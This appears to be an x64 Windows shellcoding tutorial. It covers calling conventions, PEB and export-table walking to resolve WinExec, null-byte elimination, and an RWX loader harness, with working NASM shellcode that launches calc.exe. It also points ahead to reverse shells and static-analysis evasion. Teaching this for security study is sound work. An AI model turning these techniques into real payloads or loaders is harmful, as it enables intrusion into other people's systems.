x64 Assembly & Shellcoding 101

Module One

x64 Essentials — Registers, Stack Alignment & Shadow Space

// The boring vital stuff that makes everything else work

Learning Objectives

Understand the x64 register set — volatile vs. non-volatile and why it matters for shellcode
Implement correct 16-byte stack alignment before every function call
Allocate and manage shadow space correctly in NASM
Pass 1–4+ parameters using the Windows x64 calling convention
Set up a working NASM build environment on Windows

Registers — Volatile vs. Non-Volatile

The x64 register set is the foundation of everything in this course. Before writing a single line of shellcode, you need to know which registers you can trust across function calls and which ones will be clobbered. Get this wrong and your shellcode will fail in subtle, maddening ways.

The Windows x64 ABI divides registers into two categories. Volatile registers — RAX, RCX, RDX, R8, R9, R10, R11 — are considered scratch registers that any function call is free to destroy. If you store a value in RCX before a call, don't expect it to be there afterward. Non-volatile registers — RBX, RBP, RDI, RSI, R12–R15, RSP — are preserved across calls by the callee. For shellcode, we rely heavily on R12–R15 to store API handles and base addresses we need to keep throughout execution.

Register	Type	Role in Shellcode	Sub-registers (64→8-bit)
RAX	Volatile	Return value from function calls; scratch	RAX → EAX → AX → AL/AH
RCX	Volatile	1st function parameter	RCX → ECX → CX → CL
RDX	Volatile	2nd function parameter	RDX → EDX → DX → DL
R8	Volatile	3rd function parameter	R8 → R8D → R8W → R8B
R9	Volatile	4th function parameter	R9 → R9D → R9W → R9B
R10/R11	Volatile	Scratch; not used for parameters (5th and later arguments go on the stack)	R10 → R10D → R10W → R10B (same pattern for R11)
RBX	Non-Volatile	Loop counters, base pointers	RBX → EBX → BX → BL
R12	Non-Volatile	Store DLL base addresses (kernel32, user32)	R12 → R12D → R12W → R12B
R13	Non-Volatile	Store resolved API addresses	R13 → R13D → R13W → R13B
R14	Non-Volatile	Store resolved API addresses	R14 → R14D → R14W → R14B
R15	Non-Volatile	Store resolved API addresses	R15 → R15D → R15W → R15B
RSP	Non-Volatile	Stack pointer — must be 16-byte aligned before calls	RSP only
RIP	Special	Instruction pointer — used in PIC code for addressing	RIP only

16-Byte Stack Alignment

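This is one of the most important, and most confusing, aspects of x64 assembly for newcomers. The Windows x64 ABI requires that RSP be divisible by 16 (aligned to a 16-byte boundary) immediately before any call instruction. If you violate this, the callee can fault: many Windows APIs use aligned SSE instructions such as movaps on stack data, and those raise an access violation when RSP is off by 8. The crash usually shows up deep inside the API rather than at your call, which makes it hard to trace.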

The simplest mental model: the last hex digit of RSP must be 0 before a call. Instructions that modify RSP by 8 bytes each — push and pop — flip it between aligned and unaligned. Track your pushes and pops carefully.

ℹ Quick check: If RSP ends in 8 (e.g., 0x...ff8) you're misaligned by 8. A single push rax or sub rsp, 8 will re-align it. If it ends in 0 you're good to call.
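
The push/pop bookkeeping above can be rehearsed off-target. The following is a minimal Python sketch, not part of the course code: the helper names and the starting RSP value 0x14FEF8 are made up for illustration, and it only models the arithmetic, not a real stack.

```python
def is_call_aligned(rsp):
    """True when RSP is on a 16-byte boundary (last hex digit is 0)."""
    return rsp % 16 == 0


def simulate(rsp, ops):
    """Apply (operation, amount) pairs to a model RSP and return the result.

    For "push"/"pop" the amount is a count of 8-byte slots;
    for "sub"/"add" it is a byte count, as in `sub rsp, 0x28`.
    """
    for op, amount in ops:
        if op == "push":
            rsp -= 8 * amount
        elif op == "pop":
            rsp += 8 * amount
        elif op == "sub":
            rsp -= amount
        elif op == "add":
            rsp += amount
        else:
            raise ValueError("unknown stack operation: " + op)
    return rsp


if __name__ == "__main__":
    entry_rsp = 0x14FEF8  # hypothetical entry value ending in 8 (misaligned)
    after_prologue = simulate(entry_rsp, [("sub", 0x28)])
    print(hex(after_prologue), is_call_aligned(after_prologue))
    after_one_push = simulate(after_prologue, [("push", 1)])
    print(hex(after_one_push), is_call_aligned(after_one_push))
```

Feeding it the exact sequence of pushes, pops, and sub/add instructions that precede a call shows whether that call site is aligned before you ever open the debugger.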

      NASM x64
      stack_align_example.asm — demonstrating alignment mechanics
    
; Stack alignment demonstration
; Entry point — RSP is typically misaligned here by 8 (CALL pushed return addr)
; Fix it immediately at the top of your code:

sub rsp, 0x28        ; 0x20 shadow space + 0x8 to fix alignment = 0x28
and rsp, 0xFFFFFFFFFFFFFFF0  ; nuclear option: force-align RSP (use at entry if unsure)

; Before a call with 4 or fewer args — allocate shadow space:
sub rsp, 0x30        ; 0x20 shadow + 0x10 to maintain 16-byte alignment
call r15            ; call our stored API address
add rsp, 0x30        ; restore RSP after the call

; WinExec example — 2 parameters (RCX, RDX)
pop r15             ; WinExec address previously pushed onto stack
xor rax, rax        ; zero RAX (we'll use this for NULL terminator trick later)
push rax            ; push NULL — RSP now misaligned (odd push count)
mov rax, 0x6578652E636C6163  ; "calc.exe" in little-endian hex
push rax            ; push string — RSP now aligned again (even push count)
mov rcx, rsp        ; RCX (1st param) = pointer to "calc.exe" string
mov rdx, 1          ; RDX (2nd param) = SW_SHOWNORMAL
sub rsp, 0x30        ; shadow space allocation — keeps alignment
call r15            ; WinExec("calc.exe", 1)
add rsp, 0x30        ; restore shadow space

Shadow Space

Shadow space (also called the "home space" or "spill area") is 32 bytes (4 × 8-byte slots) that the caller must reserve on the stack before every call. Even if a function takes zero arguments, you must still reserve the full 0x20 bytes (sub rsp, 0x20). The callee may use this space to spill its register parameters to memory, but that's the callee's business. Your job as the caller is just to make sure it's there.

In practice, you'll almost always see sub rsp, 0x28 or sub rsp, 0x30 before a call — the extra 8 or 16 bytes are to maintain 16-byte alignment on top of the 32-byte shadow requirement.
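
Where the 0x28 and 0x30 figures come from can be worked out mechanically. This is a small sketch under stated assumptions: frame_size is a hypothetical helper, it counts only integer or pointer arguments, and it returns the smallest valid value (a larger multiple such as 0x30 is also fine when RSP is already aligned).

```python
SHADOW_SPACE = 0x20  # four 8-byte home slots, always reserved


def frame_size(num_args, rsp_mod16_before_sub):
    """Smallest `sub rsp, N` that reserves shadow space plus stack
    arguments and leaves RSP 16-byte aligned for the call.

    rsp_mod16_before_sub is RSP % 16 before the sub: 0 if aligned,
    8 if off by one push (for example right after entry via CALL).
    """
    stack_args = max(0, num_args - 4)      # arguments 5+ live on the stack
    needed = SHADOW_SPACE + 8 * stack_args
    padding = (rsp_mod16_before_sub - needed) % 16
    return needed + padding


if __name__ == "__main__":
    print(hex(frame_size(2, 8)))  # misaligned entry, two register args
    print(hex(frame_size(2, 0)))  # already aligned, two register args
    print(hex(frame_size(5, 0)))  # one stack argument
```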

Calling Convention — Passing Parameters

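Windows x64 uses a register-based calling convention for the first four arguments (RCX, RDX, R8, R9). Arguments 5 and beyond go on the stack directly above the shadow space: at the moment of the call they sit at [RSP+0x20], [RSP+0x28], and so on, and the callee sees them at [RSP+0x28], [RSP+0x30] once the return address has been pushed. This is one of the trickiest parts of the reverse shell module, where CreateProcessA needs stack-passed arguments and STARTUPINFOA requires many fields.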
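
As a quick reference for where each argument lands, here is an illustrative Python sketch. arg_locations is a hypothetical helper; it covers integer and pointer arguments only and reports offsets as the caller sees them immediately before the call instruction (the callee sees each stack slot 8 bytes higher because of the pushed return address).

```python
REGISTER_ARGS = ["RCX", "RDX", "R8", "R9"]
SHADOW_SPACE = 0x20


def arg_locations(num_args):
    """Return where each integer/pointer argument goes, caller's view."""
    locations = []
    for index in range(num_args):
        if index < 4:
            locations.append(REGISTER_ARGS[index])
        else:
            # Stack arguments start directly above the 32-byte shadow space.
            offset = SHADOW_SPACE + 8 * (index - 4)
            locations.append("[RSP+0x%X]" % offset)
    return locations


if __name__ == "__main__":
    for number, where in enumerate(arg_locations(6), start=1):
        print("arg %d -> %s" % (number, where))
```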

NASM is the assembler of choice for this course. Download the Windows binary from nasm.us and add it to your PATH. You'll also need a linker — MinGW-w64 (via winlibs) is recommended. The exact toolchain used in this course:
- NASM 2.16+ — nasm.us/pub/nasm/releasebuilds
- MinGW-w64 (winlibs build) — includes ld, gcc, and friends
- x64dbg — for debugging and verifying stack state during development
- Pepper PE Viewer — for manually walking PE headers (Module 2)
Standard compile+link pipeline for a standalone executable:

💡 nasm -f win64 shellcode.asm -o shellcode.obj then ld -m i386pep shellcode.obj -o shellcode.exe -lkernel32

For pure shellcode extraction (no PE wrapper), compile with NASM raw binary output: nasm -f bin shellcode.asm -o shellcode.bin. The source must declare BITS 64, because the bin format defaults to 16-bit mode. The output file already is the raw byte stream; format it for a loader with a Python script or inspect it with objdump.

Understanding sub-registers is essential for NULL-free shellcode (Module 3) and for working with PE structure fields that mix WORD, DWORD, and QWORD sizes.
- RAX = full 64-bit register
- EAX = lower 32 bits — writing EAX zero-extends into RAX (important: clears upper 32 bits)
- AX = lower 16 bits — writing AX does NOT zero-extend upper bits
- AL = lower 8 bits; AH = bits 8-15
The zero-extension behavior of 32-bit writes is a powerful NULL-free trick: xor eax, eax is a 2-byte instruction that zeroes all 64 bits of RAX — whereas mov rax, 0 produces null bytes in the encoding.
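
The difference between 32-bit, 16-bit, and 8-bit writes is easy to model. The sketch below is plain Python integer arithmetic, not an emulator; the function names are invented for this example.

```python
MASK64 = (1 << 64) - 1


def write_eax(rax, value):
    """32-bit write: the upper 32 bits of RAX are cleared, old value ignored."""
    return value & 0xFFFFFFFF


def write_ax(rax, value):
    """16-bit write: only bits 0-15 change, bits 16-63 are preserved."""
    return (rax & ~0xFFFF & MASK64) | (value & 0xFFFF)


def write_al(rax, value):
    """8-bit write: only bits 0-7 change."""
    return (rax & ~0xFF & MASK64) | (value & 0xFF)


if __name__ == "__main__":
    rax = 0x1122334455667788
    print(hex(write_eax(rax, 0)))   # models xor eax, eax
    print(hex(write_ax(rax, 0)))    # models xor ax, ax
    print(hex(write_al(rax, 0)))    # models xor al, al
```

Only the 32-bit form leaves a fully zeroed register, which is why xor eax, eax works as a zeroing idiom and xor ax, ax does not.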

💡 CL is the lower 8 bits of RCX — you'll see this used for shift/rotate amounts like shl rax, cl when the shift count is stored in RCX.

x64 is little-endian. When you move a string into a register and push it to the stack, the least significant byte of the register lands at the lowest address. The immediate therefore looks reversed in the source, but the string reads correctly as a C string because the pointer refers to the lowest address.

To encode calc.exe as a 64-bit immediate: read the characters in reverse, convert each to hex, and concatenate: e=65, x=78, e=65, .=2E, c=63, l=6C, a=61, c=63 → 0x6578652E636C6163

💡 Python encoder: s = "calc.exe"; print(hex(int.from_bytes(s.encode(), 'little'))) prints 0x6578652e636c6163, which is the immediate ready to use. Passing 'little' performs the byte reversal for you.
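
For strings that do not fit in one register, the same conversion can be applied per 8-byte chunk. This is a minimal sketch, assuming ASCII input; string_to_pushes is a hypothetical helper and not a tool shipped with the course.

```python
def string_to_pushes(text):
    """Split an ASCII string into 8-byte chunks and return the 64-bit
    immediates in the order they must be pushed (last chunk first),
    so that the string reads forward from the final RSP."""
    data = text.encode("ascii")
    chunks = [data[i:i + 8] for i in range(0, len(data), 8)]
    return [int.from_bytes(chunk, "little") for chunk in reversed(chunks)]


if __name__ == "__main__":
    for name in ("calc.exe", "user32.dll"):
        print(name, [hex(value) for value in string_to_pushes(name)])
```

Two caveats apply. A final chunk shorter than 8 bytes is zero-padded, which terminates the string in memory but also puts null bytes in the immediate. A string whose length is an exact multiple of 8 has no padding at all, so a separate zero qword must be pushed first as the terminator.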

⚠ Strings longer than 8 characters must be split across multiple pushes. Plan your string layout carefully: each push places exactly 8 bytes on the stack.

x64dbg is the primary debugging tool for shellcode development. Essential workflow:
- Set breakpoints on your code's entry point to inspect initial register/stack state
- Single-step (F7) through each instruction watching the register panel
- Watch the stack panel — verify RSP divisibility by 16 before every CALL
- Use the memory map view to verify allocated regions (VirtualAlloc verification)
- Set hardware breakpoints on memory addresses to catch unexpected writes
The register panel in x64dbg highlights changed registers in red after each step — invaluable for spotting unexpected clobbers from function calls and confirming your non-volatile register strategy is working.

💡 Before your CALL instruction, check the last hex digit of RSP in x64dbg's register panel. Must be 0. If it's 8, you need one more push or sub rsp, 8.

Module Two

PE Structure & Walking the Export Table

// Finding WinExec without importing anything

Learning Objectives

Navigate the PEB to locate kernel32.dll base address without any imports
Walk the PE export directory to resolve function addresses by name
Understand the AddressOfNames → Ordinals → AddressOfFunctions lookup chain
Use Pepper PE Viewer to manually verify offsets before coding them
Write the foundational export-table-walking stub that every shellcode in this course builds on

Why Walk the PE Table?

Position-independent shellcode can't import functions the normal way — there's no Import Address Table (IAT) at a fixed address. Instead, we locate what we need at runtime by walking the Process Environment Block (PEB) to find loaded modules, then parsing the PE export table of each module to resolve function addresses by name. This technique is used in virtually every non-trivial shellcode payload in the wild.

The chain: GS:[0x60] → PEB → PEB_LDR_DATA → InMemoryOrderModuleList → kernel32 base → PE headers → Export Directory → AddressOfNames / AddressOfFunctions

PEB Walk — Locating kernel32.dll

The PEB (Process Environment Block) is accessible at GS:[0x60] in x64. It contains a pointer to PEB_LDR_DATA at offset 0x18, which contains the InMemoryOrderModuleList at offset 0x20. This doubly-linked list contains every loaded module. In a standard Windows process the first entry is the executable itself, the second is ntdll.dll, and the third is kernel32.dll. The walk below relies on that order, so confirm it in x64dbg on your target.
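
The offsets used in the walk can be sanity-checked without a debugger by modelling the structures. The sketch below uses Python's ctypes with a reduced field list: it is a simplified model of the 64-bit layouts, pointers are declared as 64-bit integers so the result does not depend on the Python build, and everything after DllBase is omitted.

```python
import ctypes


class LIST_ENTRY(ctypes.Structure):
    _fields_ = [("Flink", ctypes.c_uint64), ("Blink", ctypes.c_uint64)]


class PEB_LDR_DATA(ctypes.Structure):
    _fields_ = [
        ("Length", ctypes.c_uint32),
        ("Initialized", ctypes.c_uint8),
        ("SsHandle", ctypes.c_uint64),
        ("InLoadOrderModuleList", LIST_ENTRY),
        ("InMemoryOrderModuleList", LIST_ENTRY),
    ]


class LDR_DATA_TABLE_ENTRY(ctypes.Structure):
    # Only the leading fields are modelled here.
    _fields_ = [
        ("InLoadOrderLinks", LIST_ENTRY),
        ("InMemoryOrderLinks", LIST_ENTRY),
        ("InInitializationOrderLinks", LIST_ENTRY),
        ("DllBase", ctypes.c_uint64),
    ]


if __name__ == "__main__":
    print(hex(PEB_LDR_DATA.InMemoryOrderModuleList.offset))
    link = LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks.offset
    base = LDR_DATA_TABLE_ENTRY.DllBase.offset
    # Distance from the list link we are standing on to DllBase.
    print(hex(base - link))
```

The second value explains why the code reads DllBase at +0x20: the list pointer refers to the InMemoryOrderLinks field inside the entry, not to the start of the entry.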

      NASM x64
      peb_walk.asm — locate kernel32.dll base address via PEB
    
; peb_walk.asm — g3tsyst3m Module 2
; Locate kernel32.dll base address via the PEB InMemoryOrderModuleList
; Result: kernel32 base address in R8 (volatile: copy it to a non-volatile register before calling any API)

sub rsp, 0x28                ; stack alignment + shadow space prologue
and rsp, 0xFFFFFFFFFFFFFFF0    ; force-align RSP

; ── Step 1: Get PEB address from GS segment register ──
mov rax, [gs:0x60]           ; RAX = PEB base address

; ── Step 2: Get PEB_LDR_DATA ──
mov rax, [rax+0x18]          ; RAX = PEB->Ldr (PEB_LDR_DATA*)

; ── Step 3: InMemoryOrderModuleList.Flink (first entry = the process image) ──
mov rax, [rax+0x20]          ; RAX = first LIST_ENTRY (the executable itself)
mov rax, [rax]              ; RAX = second entry (ntdll.dll)
mov rax, [rax]              ; RAX = third entry (kernel32.dll in a typical process)

; ── Step 4: Extract DllBase (base address) ──
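; RAX points at the entry's InMemoryOrderLinks field (offset 0x10 of LDR_DATA_TABLE_ENTRY);
; DllBase is at offset 0x30, so it sits +0x20 from the link pointer
mov r8, [rax+0x20]          ; R8 = kernel32.dll base address (R8 is volatile; safe here only because no call intervenes)
mov rbx, r8                ; RBX = kernel32 base (working copy for PE parsing)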

; ── Step 5: Navigate to PE header ──
mov ebx, [rbx+0x3C]         ; EBX = RVA of PE signature (e_lfanew field)
add rbx, r8                ; RBX = VMA of PE header (kernel32 base + RVA)

Export Directory Walk — Resolving WinExec

With the PE header address in hand, we navigate to the Export Directory and walk three parallel arrays: AddressOfNames (function name strings), AddressOfNameOrdinals (index mapping names to functions), and AddressOfFunctions (actual RVAs). The lookup: search AddressOfNames for our target string → get the ordinal index → use that to index into AddressOfFunctions → add kernel32 base to get the VMA.

      NASM x64
      export_walk.asm — walk PE export table to resolve WinExec
    
; export_walk.asm — g3tsyst3m Module 2
; Continues from peb_walk.asm — RBX = PE header VMA, R8 = kernel32 base
; Goal: resolve WinExec address into R15

; ── Navigate to Export Directory ──
; Export Directory RVA is at PE_header+0x88 (IMAGE_OPTIONAL_HEADER64 DataDirectory[0])
xor rcx, rcx               ; clear RCX — used as counter
add cx, 0x88ff             ; add 0x88ff to lower 16 bits (NULL-free trick for 0x88)
shr rcx, 0x8              ; shift right — RCX = 0x88 (our export dir offset)
mov edx, [rbx+rcx]        ; EDX = Export Directory RVA
add rdx, r8               ; RDX = Export Directory VMA

; ── Get NumberOfNames and AddressOfNames ──
mov r10d, [rdx+0x18]       ; R10D = NumberOfNames (bounds the name search)
xor r11, r11               ; R11 = 0 (name index i)
mov r12d, [rdx+0x20]       ; R12D = AddressOfNames RVA
add r12, r8               ; R12  = AddressOfNames VMA

; ── Load target function name "WinExec" onto stack for comparison ──
mov ecx, r10d              ; ECX = loop counter; RDX keeps the Export Dir pointer
mov rax, 0x6F9C9A87BA9196A8  ; NOT of 0x90636578456E6957 ("WinExec" + 0x90 placeholder, Module 4 style)
not rax                   ; decode: RAX = 0x90636578456E6957
shl rax, 0x8              ; shift the 0x90 placeholder out of the top byte
shr rax, 0x8              ; shift back: the top byte is now 0x00, the terminator
push rax                  ; push "WinExec\0" to stack
mov rax, rsp              ; RAX = pointer to "WinExec" string
add rsp, 0x8              ; rebalance RSP; the string now sits below RSP, so do not push or call until the search ends

; ── Name search loop ──
findname:
jecxz done               ; ECX = 0: every name checked, target not found
mov ebx, [r12+r11*4]       ; EBX = AddressOfNames[i] RVA (32-bit write zero-extends RBX)
add rbx, r8               ; RBX = function name string VMA
dec rcx                   ; one fewer name left to check
mov r13, [rbx]            ; R13 = first 8 bytes of function name
cmp r13, [rax]            ; compare with our target "WinExec\0"
je found
inc r11                   ; increment name index
jmp findname

found:
; ── Get ordinal → function address ──
mov r13d, [rdx+0x24]       ; R13D = AddressOfNameOrdinals RVA
add r13, r8               ; R13  = AddressOfNameOrdinals VMA
movzx r13d, word [r13+r11*2] ; R13 = AddressOfNameOrdinals[i], zero-extended (a 16-bit write would keep the old upper bits)

mov r14d, [rdx+0x1C]       ; R14D = AddressOfFunctions RVA
add r14, r8               ; R14  = AddressOfFunctions VMA
mov eax, [r14+r13*4]       ; EAX  = WinExec function RVA
add rax, r8               ; RAX  = WinExec VMA (final resolved address!)
mov r15, rax               ; R15  = WinExec address (non-volatile storage)

done:

Before writing PE-walking code, manually verify the offsets you expect to find using a PE viewer. Pepper (a free x64-capable PE viewer) is the tool used throughout this course. Load kernel32.dll into Pepper and navigate to the Export Directory.
- DOS Header → e_lfanew field at offset 0x3C: points to the PE signature
- Optional Header → Data Directory[0] at PE+0x88: Export Directory RVA
- Export Directory: +0x14 = NumberOfFunctions, +0x18 = NumberOfNames, +0x1C = AddressOfFunctions RVA, +0x20 = AddressOfNames RVA, +0x24 = AddressOfNameOrdinals RVA
Cross-reference what Pepper shows against what your shellcode computes in x64dbg — if they don't match, your offset arithmetic is wrong.
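
The offsets in this checklist can be derived rather than memorized. The following sketch recomputes them from the field sizes of the PE32+ headers and IMAGE_EXPORT_DIRECTORY; the helper names are invented for this example, and the field list follows the public PE format description.

```python
import struct

PE_SIGNATURE_SIZE = 4            # "PE\0\0"
FILE_HEADER_SIZE = 20            # IMAGE_FILE_HEADER
DATA_DIRECTORY_IN_OPT64 = 0x70   # DataDirectory offset inside IMAGE_OPTIONAL_HEADER64

EXPORT_DIRECTORY_FIELDS = [
    ("Characteristics", "I"), ("TimeDateStamp", "I"),
    ("MajorVersion", "H"), ("MinorVersion", "H"),
    ("Name", "I"), ("Base", "I"),
    ("NumberOfFunctions", "I"), ("NumberOfNames", "I"),
    ("AddressOfFunctions", "I"), ("AddressOfNames", "I"),
    ("AddressOfNameOrdinals", "I"),
]


def export_directory_rva_offset():
    """Offset of DataDirectory[0].VirtualAddress from the PE signature."""
    return PE_SIGNATURE_SIZE + FILE_HEADER_SIZE + DATA_DIRECTORY_IN_OPT64


def field_offsets():
    """Map each IMAGE_EXPORT_DIRECTORY field name to its byte offset."""
    offsets, position = {}, 0
    for name, fmt in EXPORT_DIRECTORY_FIELDS:
        offsets[name] = position
        position += struct.calcsize("<" + fmt)
    return offsets


if __name__ == "__main__":
    print(hex(export_directory_rva_offset()))
    for name, offset in field_offsets().items():
        print("+0x%02X %s" % (offset, name))
```

Note that NumberOfFunctions is at +0x14 and NumberOfNames at +0x18; the name search should be bounded by the latter.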

💡 On Windows 11, some PE viewers report that the AddressOfNames index aligns directly with the AddressOfFunctions index without needing the ordinal lookup. Test on your target OS, since behavior may vary.

The three arrays in the Export Directory work together as a cross-referenced lookup table. AddressOfNames and AddressOfNameOrdinals are parallel (both have NumberOfNames entries), but AddressOfFunctions can be longer: it has NumberOfFunctions entries and includes functions exported by ordinal only, which have no name.
- AddressOfNames[i] → RVA of the name string for the i-th named export
- AddressOfNameOrdinals[i] → ordinal index into AddressOfFunctions for the i-th named export
- AddressOfFunctions[ordinal] → RVA of the actual function
So the flow is: scan AddressOfNames until you find your target function name → record index i → look up AddressOfNameOrdinals[i] to get ordinal j → look up AddressOfFunctions[j] to get the function RVA → add DLL base to get the VMA you can call.
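
The lookup chain is easier to see on toy data. In this Python sketch the export names, RVAs, and base address are all invented; the point is only that the name index i and the function index j differ as soon as one export has no name.

```python
def resolve_export(base, names, name_ordinals, functions, target):
    """Model of the three-array lookup: name -> index i -> ordinal j -> RVA -> VMA."""
    for i, name in enumerate(names):
        if name == target:
            j = name_ordinals[i]          # AddressOfNameOrdinals[i]
            return base + functions[j]    # AddressOfFunctions[j] + DLL base
    return None                           # name not exported


# Hypothetical export table: the middle function is exported by ordinal only.
FUNCTIONS = [0x1000, 0x2000, 0x3000]      # AddressOfFunctions (RVAs)
NAMES = ["Alpha", "Gamma"]                # AddressOfNames (resolved strings)
NAME_ORDINALS = [0, 2]                    # AddressOfNameOrdinals
BASE = 0x7FF000000000                     # made-up DLL base

if __name__ == "__main__":
    address = resolve_export(BASE, NAMES, NAME_ORDINALS, FUNCTIONS, "Gamma")
    print(hex(address))
```

Indexing AddressOfFunctions directly with the name index would return the ordinal-only function's RVA for "Gamma" here, which is exactly the mistake the ordinal array prevents.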

⚠ Always add the DLL base address to RVAs. A common mistake is using the RVA directly as a call target. It will crash because RVAs are relative to the DLL base, not absolute addresses.

An interesting observation noted during development of this course: on Windows 11 (tested on two separate machines), the AddressOfNames index appears to align directly with the AddressOfFunctions index, making the AddressOfNameOrdinals lookup potentially redundant for straightforward name-based resolution.

This behavior may be implementation-specific or version-dependent. The course code uses the full three-array lookup which is correct and portable across all Windows versions. If you're targeting exclusively Windows 11 and want to simplify your code, test this observation on your specific build before relying on it.

💡 This is the kind of internals observation worth writing about: small deviations from documented behavior that practitioners discover empirically. Document your findings for the community.

With WinExec resolved into R15, executing calc.exe is straightforward. The key is correct string placement and parameter passing:
- Push a NULL terminator (using a zeroed register, not a literal 0 which creates null bytes)
- Push the "calc.exe" string bytes in little-endian order
- Set RCX = RSP (pointer to the string)
- Set RDX = 1 (SW_SHOWNORMAL)
- Allocate shadow space, call R15
At this point the shellcode contains null bytes — that's acceptable for a first test. Module 3 covers removing them for use in buffer overflows and shellcode loaders that use strcpy-style copying.

⚠ This version of the shellcode is NOT suitable for use via buffer overflow or most shellcode loaders due to embedded null bytes. Module 3 is required before operational use.

Module Three

NULL Byte Elimination

// Making shellcode actually usable in the real world

Learning Objectives

Identify every source of null bytes in x64 assembly output using objdump
Apply shift-based null termination to push strings without null bytes in shellcode
Use XOR + ADD tricks for loading memory offsets that would otherwise produce nulls
Verify null-free output and extract clean shellcode bytes

Why NULL Bytes Break Shellcode

Many classic shellcode delivery mechanisms — stack-based buffer overflows, format string exploits, and string-copy loaders — treat 0x00 as a string terminator. If your shellcode contains a null byte, the delivery mechanism stops copying at that point and your payload is truncated. NULL-free shellcode is not optional for real-world use — it's a requirement.

The good news: every instruction that produces a null byte has a null-free equivalent, just less obvious. The core techniques are shift-based string null-termination, XOR/ADD for zero values, and careful register sizing.

      NASM x64
      null_removal.asm — key techniques for eliminating null bytes
    
; null_removal.asm — g3tsyst3m Module 3
; Core techniques for NULL-free shellcode

; ── Technique 1: XOR to zero a register (no null bytes) ──
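; BAD:  mov rax, 0     → the zero is stored as immediate bytes: \x48\xb8 plus eight \x00 in the full 64-bit form,
;                        and the shorter forms an optimizing assembler may pick still embed nulls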
; GOOD: xor rax, rax   → produces \x48\x31\xc0 (3 bytes, zero nulls)
xor rax, rax               ; zero RAX — the canonical null-free zeroing idiom
xor rcx, rcx               ; same for RCX (first parameter)

; ── Technique 2: Shift-based string null termination ──
; Goal: push "WinExec\0" without embedding a 0x00 byte in our shellcode
; "WinExec" = 7 bytes. We load 8 bytes with 0x90 as a placeholder in the most significant byte (the last byte in memory)
mov rax, 0x90636578456E6957  ; 0x90 + "WinExec" — 0x90 is our non-null placeholder
shl rax, 0x8               ; shift left 8 bits → 0x636578456E695700 (0x90 gone, null at MSB)
shr rax, 0x8               ; shift right 8 bits → 0x00636578456E6957 (null byte in MSB position)
push rax                   ; stack now has "WinExec\0" — the null is IN MEMORY, not in shellcode!

; ── Technique 3: ADD/SHR trick for NULL-free memory offsets ──
; Problem: mov edx, [rbx+0x88] → 0x88 does not fit in a signed 8-bit displacement (max 0x7F),
; so the assembler emits a 32-bit displacement 88 00 00 00 with three null bytes. Use a register offset instead:
xor rcx, rcx               ; zero RCX
add cx, 0x88ff             ; add 0x88ff to CX (16-bit) — no null bytes in this encoding
shr rcx, 0x8               ; shift right 8 → RCX = 0x88 (the value we wanted)
mov edx, [rbx+rcx]        ; now use RCX as the offset — no null in encoding!

; ── Technique 4: Use JECXZ instead of loop with potential null branch ──
; jecxz (jump if ECX is zero) is 3 bytes in 64-bit mode (67 E3 rel8; jrcxz drops the 0x67 prefix), no nulls, good for loop control
jecxz done                 ; jump to done if ECX = 0 (exhausted function names)

; ── Verification: use objdump to check for nulls ──
; objdump -d -M intel shellcode.obj | grep " 00 "
; Any line with " 00 " in the hex column is a null byte — fix it!

The fastest way to audit your shellcode for null bytes is objdump from the MinGW-w64 toolchain. After compiling your .asm file to a .obj, run:

💡 objdump -d -M intel shellcode.obj | grep -E " 00 | 00$" — any match is a null byte in your machine code that needs to be eliminated.

Common null byte sources to look for:
- mov rax, 0: the zero immediate is stored as null bytes. Replace with xor rax, rax
- mov rdx, 1: the immediate 1 is zero-padded to a full 32- or 64-bit field, so the encoding contains nulls. Use xor rdx, rdx; inc rdx
- push 0: use xor rax, rax; push rax instead
- String immediates with fewer than 8 significant bytes: the high bytes are zero-padded, which produces null bytes
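
To see exactly where the nulls sit in a byte sequence, a few lines of Python are enough. This is an illustrative sketch; null_offsets is a hypothetical helper, and the two sample encodings are the standard bytes for xor rax, rax and mov eax, 1.

```python
def null_offsets(blob):
    """Return the offset of every 0x00 byte in a bytes object."""
    return [index for index, byte in enumerate(blob) if byte == 0]


if __name__ == "__main__":
    samples = {
        "xor rax, rax": bytes.fromhex("4831c0"),
        "mov eax, 1": bytes.fromhex("b801000000"),
    }
    for text, encoding in samples.items():
        offsets = null_offsets(encoding)
        status = "clean" if not offsets else "nulls at %s" % offsets
        print("%-14s %s" % (text, status))
```

Reading a file with open(path, "rb").read() and passing the result to null_offsets gives the offsets to look up in the objdump listing.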
After fixing all nulls, extract your shellcode bytes with: objcopy -O binary shellcode.obj shellcode.bin then verify with python3 -c "d=open('shellcode.bin','rb').read(); print('CLEAN' if 0 not in d else f'NULLS: {d.count(0)}')" (testing for the integer 0 avoids backslash escapes, which cmd.exe and bash quote differently).

Shift-based null termination is the most elegant null-free technique in the course and worth deeply understanding. The insight: a null byte is only a problem when it appears in the machine code (the shellcode bytes themselves). A null byte that only exists in memory at runtime (on the stack after a push) is perfectly fine.

The SHL/SHR pair creates a runtime null terminator:
- Load the string with a non-null placeholder byte (e.g., 0x90) in the highest position
- shl rax, 8 shifts the placeholder off the top, pushing a 0x00 in from the bottom — but this 0x00 is not in the shellcode, it's created by the CPU during execution
- shr rax, 8 shifts everything back, leaving the null at the top (MSB) of RAX
- push rax places the properly null-terminated string on the stack
The SHL and SHR instructions themselves encode as non-null bytes. The null only materializes as data during execution — exactly what we need.
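
The SHL/SHR pair can be checked with ordinary integer arithmetic. The sketch below models 64-bit shifts in Python; the function names are invented, and the only behaviour modelled is that bits shifted past bit 63 are discarded.

```python
MASK64 = (1 << 64) - 1


def shl64(value, count):
    """64-bit logical shift left: bits pushed past bit 63 are lost."""
    return (value << count) & MASK64


def shr64(value, count):
    """64-bit logical shift right: zeros enter from the top."""
    return (value & MASK64) >> count


def null_terminate(value):
    """Model of `shl rax, 8` followed by `shr rax, 8`."""
    return shr64(shl64(value, 8), 8)


if __name__ == "__main__":
    loaded = 0x90636578456E6957           # "WinExec" with 0x90 placeholder on top
    result = null_terminate(loaded)
    print(hex(result))
    print(result.to_bytes(8, "little"))   # the bytes as they land on the stack
```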

Once you've confirmed no nulls with objdump, extract the raw shellcode bytes and test them in a C++ loader:

💡 Extract: for /f "tokens=1*" %a in ('objdump -d shellcode.obj') do @echo %b — or use the Python extraction script provided in the course materials.

The standard test harness used throughout this course:
- Declare shellcode as unsigned char shellcode[] with your extracted bytes
- Allocate RWX memory with VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
- Copy shellcode to the allocation with memcpy
- Cast the allocation to a function pointer and call it
If it executes correctly, your shellcode is ready for use in exploit development or payload delivery. The Module 8 loader wraps this into a production-ready harness.

Module Four

String Encoding with Bitwise Operations

// Defeating static analysis without an encoder framework

